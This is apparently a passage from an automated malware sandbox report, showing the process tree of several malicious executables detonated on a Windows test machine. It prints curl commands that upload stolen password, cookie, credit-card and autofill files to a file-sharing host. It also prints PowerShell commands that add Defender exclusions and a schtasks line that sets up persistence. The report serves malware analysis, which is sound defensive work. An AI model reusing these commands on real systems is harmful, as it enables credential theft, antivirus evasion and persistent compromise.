        Suspicious use of SetWindowsHookEx
        
        PID:1304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JSiBfvBtm4bl.bat" "
        28⤵
        
        PID:4924
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        29⤵
        
        PID:5620
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        29⤵
        Runs ping.exe
        
        PID:3916
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        29⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:2328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MzMxqctgaAfa.bat" "
        30⤵
        
        PID:1100
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        31⤵
        
        PID:412
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        31⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        31⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v6Aj53EgxSHz.bat" "
        32⤵
        
        PID:2564
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        33⤵
        
        PID:4152
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        33⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        33⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TnPQy219H4g9.bat" "
        34⤵
        
        PID:2176
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        35⤵
        
        PID:2540
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        35⤵
        Runs ping.exe
        
        PID:4380
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        35⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zJPp0Or454A.bat" "
        36⤵
        
        PID:5228
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        37⤵
        
        PID:5500
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5036
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        37⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6fro8rI7C3Ts.bat" "
        38⤵
        
        PID:2296
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        39⤵
        
        PID:3436
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4880
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        39⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vUiCq9fBsXN9.bat" "
        40⤵
        
        PID:2088
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        41⤵
        
        PID:5820
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3884
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        41⤵
        Suspicious use of SetWindowsHookEx
        
        PID:572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wDt8BO8gNrVV.bat" "
        42⤵
        
        PID:2896
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        43⤵
        
        PID:2632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        43⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        43⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KWXUhNt3pZIG.bat" "
        44⤵
        
        PID:2532
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        45⤵
        
        PID:3244
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3572
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        45⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BLWLzMsqxYxp.bat" "
        46⤵
        
        PID:4628
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        47⤵
        
        PID:1104
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        47⤵
        Runs ping.exe
        
        PID:760
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        47⤵
        
        PID:3244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qHnu7QObQPCl.bat" "
        48⤵
        
        PID:972
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        49⤵
        
        PID:6304
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        49⤵
        
        PID:6376
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        49⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\riuuI23n2koS.bat" "
        50⤵
        
        PID:2864
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        51⤵
        
        PID:6148
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:648
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        51⤵
        Suspicious use of SetWindowsHookEx
        
        PID:8020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xWGUlrqkOAtU.bat" "
        52⤵
        
        PID:7512
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        53⤵
        
        PID:7600
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        53⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6308
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        53⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wNa1A0QPVhNq.bat" "
        54⤵
        
        PID:6188
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        55⤵
        
        PID:7408
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        55⤵
        Runs ping.exe
        
        PID:7596
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        55⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hjopHKl8yv48.bat" "
        56⤵
        
        PID:1340
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        57⤵
        
        PID:4732
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        57⤵
        
        PID:7496
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        57⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\psaLnC48QMU0.bat" "
        58⤵
        
        PID:7832
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        59⤵
        
        PID:6464
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        59⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7648
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        59⤵
        
        PID:7488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pve2Vzd7b5xp.bat" "
        60⤵
        
        PID:7472
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        61⤵
        
        PID:8092
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        61⤵
        Runs ping.exe
        
        PID:7940
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        61⤵
        
        PID:1752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3ZX56d9BEtKr.bat" "
        62⤵
        
        PID:7292
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        63⤵
        
        PID:7516
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        63⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3000
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        63⤵
        Suspicious use of SetWindowsHookEx
        
        PID:648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l3FKef1dwkgO.bat" "
        64⤵
        
        PID:3156
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        65⤵
        
        PID:5608
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        65⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2464
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        65⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YmtzO53QOfgW.bat" "
        66⤵
        
        PID:7776
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        67⤵
        
        PID:5632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        67⤵
        Runs ping.exe
        
        PID:8152
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        67⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Iyg64I4tGUs6.bat" "
        68⤵
        
        PID:7452
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        69⤵
        
        PID:1104
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        69⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5824
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        69⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jKG2S5HLMwF3.bat" "
        70⤵
        
        PID:7828
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        71⤵
        
        PID:7588
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        71⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        71⤵
        
        PID:7824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YQrFGHrgQLLq.bat" "
        72⤵
        
        PID:6636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        73⤵
        
        PID:8148
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        73⤵
        
        PID:7740
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        73⤵
        Runs ping.exe
        
        PID:3120
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        73⤵
        
        PID:6228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EEUfX1jSXhVQ.bat" "
        74⤵
        
        PID:6096
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        75⤵
        
        PID:3812
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        75⤵
        
        PID:5232
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        75⤵
        
        PID:6632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fiBQbeVZJXTD.bat" "
        76⤵
        
        PID:6244
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        77⤵
        
        PID:7072
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        77⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2844
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        77⤵
        
        PID:6584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wp7nmGZtqJ2o.bat" "
        78⤵
        
        PID:4648
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        79⤵
        
        PID:2736
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        79⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7640
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        79⤵
        
        PID:6280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4TLNTpZjWlab.bat" "
        80⤵
        
        PID:7840
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        81⤵
        
        PID:5556
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        81⤵
        Runs ping.exe
        
        PID:3408
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        81⤵
        
        PID:7304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zWEJf5Ev6mlu.bat" "
        82⤵
        
        PID:3812
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        83⤵
        
        PID:7404
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        83⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        83⤵
        
        PID:7720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3UCDKaeg4yxO.bat" "
        84⤵
        
        PID:2176
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        85⤵
        
        PID:7464
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        85⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        85⤵
        
        PID:7380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xzpLMD8LWL5v.bat" "
        86⤵
        
        PID:5204
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        87⤵
        
        PID:2648
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        87⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7980
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        87⤵
        
        PID:7392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tojbLsgwRWLH.bat" "
        88⤵
        
        PID:7240
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        89⤵
        
        PID:6568
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        89⤵
        
        PID:6468
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        89⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7868
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        89⤵
        
        PID:7104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qDvOJYv8dK8n.bat" "
        90⤵
        
        PID:5384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        91⤵
        
        PID:2292
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        91⤵
        
        PID:6884
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        91⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        91⤵
        
        PID:3000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cvfEga3cUO27.bat" "
        92⤵
        
        PID:7632
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        93⤵
        
        PID:6292
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        93⤵
        
        PID:6876
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        93⤵
        
        PID:424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Jfux2RTRFYEv.bat" "
        94⤵
        
        PID:7216
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        95⤵
        
        PID:3588
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        95⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1020
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        95⤵
        
        PID:6408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aQyNdXuPNtDS.bat" "
        96⤵
        
        PID:5320
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        97⤵
        
        PID:7296
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        97⤵
        Runs ping.exe
        
        PID:2820
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        97⤵
        
        PID:6720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fIq8Il0xTI3q.bat" "
        98⤵
        
        PID:6308
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        99⤵
        
        PID:7632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        99⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6140
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        99⤵
        
        PID:3008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5WUsK5Xve5Fc.bat" "
        100⤵
        
        PID:2576
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        101⤵
        
        PID:7736
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        101⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7548
- C:\Users\Admin\Desktop\Files\file.exe
  "C:\Users\Admin\Desktop\Files\file.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6092
- C:\Users\Admin\Desktop\Files\Extension-http.exe
  "C:\Users\Admin\Desktop\Files\Extension-http.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2144
- C:\Users\Admin\Desktop\Files\123.exe
  "C:\Users\Admin\Desktop\Files\123.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:5324
- - C:\Users\Admin\Desktop\Files\123.exe
    "C:\Users\Admin\Desktop\Files\123.exe"
    3⤵
    - Drops startup file
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:4684
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:228
- C:\Users\Admin\Desktop\Files\AsyncClient.exe
  "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:956
- C:\Users\Admin\Desktop\Files\XClient.exe
  "C:\Users\Admin\Desktop\Files\XClient.exe"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of SetWindowsHookEx
  PID:4516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5340
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4244
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2532
- C:\Users\Admin\Desktop\Files\shost.exe
  "C:\Users\Admin\Desktop\Files\shost.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:7124
- - C:\Users\Admin\Desktop\Files\shost.exe
    "C:\Users\Admin\Desktop\Files\shost.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
      4⤵
      PID:6436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im firefox.exe /t /f
        5⤵
        Kills process with taskkill
        
        PID:1920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:6524
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:7160
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:3624
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:4560
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:6740
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:2568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:7068
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:6744
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6376
- C:\Users\Admin\Desktop\Files\EakLauncher.exe
  "C:\Users\Admin\Desktop\Files\EakLauncher.exe"
  2⤵
  PID:6676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/rsM4AgvAhn
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:6520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
